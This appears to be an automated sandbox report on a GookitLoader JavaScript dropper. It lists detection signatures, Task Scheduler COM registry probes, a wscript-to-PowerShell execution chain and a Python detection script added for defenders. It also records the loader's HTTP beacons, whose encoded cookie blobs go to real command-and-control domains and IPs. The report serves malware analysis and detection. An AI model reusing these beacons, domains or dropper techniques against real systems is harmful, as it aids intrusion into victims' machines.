Windows Analysis Report
is it legal to kill a peacock in california 93889.js

Overview

General Information

Sample name: is it legal to kill a peacock in california 93889.js
Analysis ID: 1500124
MD5: 42ffe54cde30c6d3babb008f491597ad
SHA1: 7bdbe6b90df3e48cadbd494f0d2ff24fc32b287d
SHA256: 5bf0940ddb8bc56d5322f879b64c0565f66a3ed6bf4dbdadc3e5f01236e08e52

Detection

GookitLoader
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected GookitLoader
Loading BitLocker PowerShell Module
Potential evasive JS / VBS script found (domain check)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.130:443 -> 192.168.2.5:49717 version: TLS 1.2
Note: CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} is the Task Scheduler class (ProgID Schedule.Service), which is what the signature "Creates COM task schedule object" refers to. COM activation consults the per-user class hive before the machine hive, so every subkey is probed under HKEY_CURRENT_USER before HKEY_LOCAL_MACHINE.
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
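The execution chain recorded here (wscript.exe spawning powershell.exe) is what the Sigma hits "WScript or CScript Dropper", "WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript" and "Use NTFS Short Name in Command Line" key on, and the same three conditions are cheap to evaluate on endpoint process-creation telemetry. The script below is an added example written for this page; it is not code from the report, from Joe Sandbox or from the Sigma rules, and its conditions are a plain reading of those rule titles rather than the rules' exact logic. The events are constructed: only the script file name comes from the report, while the paths, PIDs and the PowerShell command line are invented.

```python
import re
from dataclasses import dataclass

# Script hosts and the interpreters they hand off to in a dropper chain
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                   "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# A script file argument, quoted or bare
SCRIPT_ARG_RE = re.compile(
    r'"[^"]+\.(?:js|jse|vbs|vbe|wsf)"|\S+\.(?:js|jse|vbs|vbe|wsf)(?=\s|$)', re.I)
# An 8.3 short-name path component such as DOWNLO~1 or ISITLE~1.JS
SHORTNAME_RE = re.compile(r"[A-Z0-9_$]{1,6}~\d+(?:\.[A-Z0-9]{1,3})?", re.I)


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> list[str]:
    """Return the names of the rules a single process-creation event trips."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    hits = []
    if image in SCRIPT_HOSTS and SCRIPT_ARG_RE.search(ev.cmdline):
        hits.append("WSF/JSE/JS/VBA/VBE file execution via cscript/wscript")
    if parent in SCRIPT_HOSTS and image in LOLBIN_CHILDREN:
        hits.append(f"WScript or CScript dropper: {parent} -> {image}")
    if SHORTNAME_RE.search(ev.cmdline):
        hits.append("NTFS short name in command line")
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map pid -> rule hits, keeping only events that tripped at least one rule."""
    findings = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            findings[ev.pid] = hits
    return findings


# Constructed telemetry (assumed, not from the report): the script name is the
# sample name above; paths, PIDs and the PowerShell arguments are invented.
SAMPLE_EVENTS = [
    ProcEvent(4100, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\is it legal to kill a peacock in california 93889.js"',
              3020, r"C:\Windows\explorer.exe"),
    ProcEvent(4188, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden',
              4100, r"C:\Windows\System32\wscript.exe"),
    ProcEvent(4200, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\user\DOWNLO~1\ISITLE~1.JS",
              3020, r"C:\Windows\explorer.exe"),
    # benign baseline: a maintenance script started by the service host, no hits
    ProcEvent(4300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -File "C:\ProgramData\ops\inventory.ps1"',
              900, r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, "; ".join(hits))
```

The parent/child rule is the one that matters in practice: a script host launching PowerShell is rare in normal use, whereas a `.js` argument to wscript.exe or an 8.3 name in a command line each occur benignly and are better treated as corroborating signals on the same process tree than as alerts on their own.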
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+RvUlNba+1u0lT5MPjNMAP8se+ZmZnXaXknenEYdxSF+AZWbLqRuvQDlkZjKdbxzAxlyB9wJiV7XhFWu9XgL2ErGBOHgkoqx6jWJrW2Xau2/qdv16bj/Tyqd2TzaqxHrLy3C2yLQSk612NIREwu2XFW987A3Vxdz7gfiydhBcgPoH3We1hcCx0LdkYxQV4IDwvizV0ZE5VSlkx0FQkir4eKPwBFoHNnIAcRPNzMLvVKYeOhA0BxKVYvHFC9DwVopRZC3H8R57MytZXFgi/UYOIi0OROMAsTUyjrPiLi+WticdhOfboopbyc/c348e2qR6rXUmC29GkNwVaTLkk36ACH3KvAQAA; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ellinikiaktoploia.netConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+RvUlNba+1u0lT5MPjNMAP8se+ZmZnXaXknenEYdxSF+AZWbLqRuvQDlkZjKdbxzAxlyB9wJiV7XhFWu9XgL2ErGBOHgkoqx6jWJrW2Xau2/qdv16bj/Tyqd2TzaqxHrLy3C2yLQSk612NIREwu2XFW987A3Vxdz7gfiydhBcgPoH3We1hcCx0LdkYxQV4IDwvizV0ZE5VSlkx0FQkir4eKPwBFoHNnIAcRPNzMLvVKYeOhA0BxKVYvHFC9DwVopRZC3H8R57MytZXFgi/UYOIi0OROMAsTUyjrPiLi+WticdhOfboopbyc/c348e2qR6rXUmC29GkNwVaTLkk36ACH3KvAQAA; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ellinikiaktoploia.netConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=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; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=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; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: global traffic DNS traffic detected: DNS query: www.shamara.de
Source: global traffic DNS traffic detected: DNS query: ipacrack.com
Source: global traffic DNS traffic detected: DNS query: ellinikiaktoploia.net
